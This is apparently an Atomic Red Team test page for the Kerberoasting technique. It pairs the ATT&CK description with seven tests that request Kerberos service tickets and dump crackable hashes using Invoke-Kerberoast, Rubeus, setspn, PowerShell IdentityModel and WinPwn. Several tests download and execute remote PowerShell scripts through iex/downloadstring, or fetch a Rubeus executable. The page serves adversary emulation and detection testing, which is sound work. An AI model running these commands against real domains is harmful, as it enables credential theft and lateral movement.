Try it using Invoke-Atomic

Steal or Forge Kerberos Tickets: Kerberoasting

Description from ATT&CK

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to Brute Force.(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to Valid Accounts.(Citation: SANS Attacking Kerberos Nov 2014)

Atomic Tests

Atomic Test #1 - Request for service tickets

This test uses the Powershell Empire Module: Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output

Supported Platforms: windows

auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
Invoke-Kerberoast | fl

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Atomic Test #2 - Rubeus kerberoast

Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus

Supported Platforms: windows

auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55

Inputs:

Name Description Type Default Value
local_folder Local path of Rubeus executable Path $Env:temp
local_executable name of the rubeus executable String rubeus.exe
out_file file where command results are stored String rubeus_output.txt
rubeus_url URL of Rubeus executable Url https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
flags command flags you would like to run (optional and blank by default) String None

Attack Commands: Run with powershell!

1
2
3
klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"

Cleanup Commands:

1
2
Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Description: Rubeus must exist

Check Prereq Commands:

1
2
if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}

Atomic Test #3 - Extract all accounts in use as SPN using setspn

The following test will utilize setspn to extract the Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output all the SPNs for the related domain.

Supported Platforms: windows

auto_generated_guid: e6f4affd-d826-4871-9a62-6c9004b8fe06

Inputs:

Name Description Type Default Value
domain_name The Domain Name to lookup against String %USERDNSDOMAIN%

Attack Commands: Run with command_prompt!

1
2
setspn -T #{domain_name} -Q */*

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Atomic Test #4 - Request A Single Ticket via PowerShell

The following test will utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.

Supported Platforms: windows

auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
4
Add-Type -AssemblyName System.IdentityModel
$ComputerFQDN=$env:LogonServer.trimStart('\') + "." + $env:UserDnsDomain
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/$ComputerFQDN" 

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Atomic Test #5 - Request All Tickets via PowerShell

The following test will utilize native PowerShell Identity modules to query the domain to extract allthe Service Principal Names. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the domain in question.

Supported Platforms: windows

auto_generated_guid: 902f4ed2-1aba-4133-90f2-cff6d299d6da

Inputs:

Name Description Type Default Value
domain_name The Domain Name to lookup against String %USERDNSDOMAIN%

Attack Commands: Run with powershell!

1
2
3
Add-Type -AssemblyName System.IdentityModel  
setspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Dependencies: Run with powershell!

Description: Computer must be domain joined

Check Prereq Commands:

1
2
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host Joining this computer to a domain must be done manually

Atomic Test #6 - WinPwn - Kerberoasting

Kerberoasting technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Kerberoasting -consoleoutput -noninteractive

Atomic Test #7 - WinPwn - PowerSharpPack - Kerberoasting Using Rubeus

PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn

Supported Platforms: windows

auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f

Inputs:

None

Attack Commands: Run with powershell!

1
2
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"

source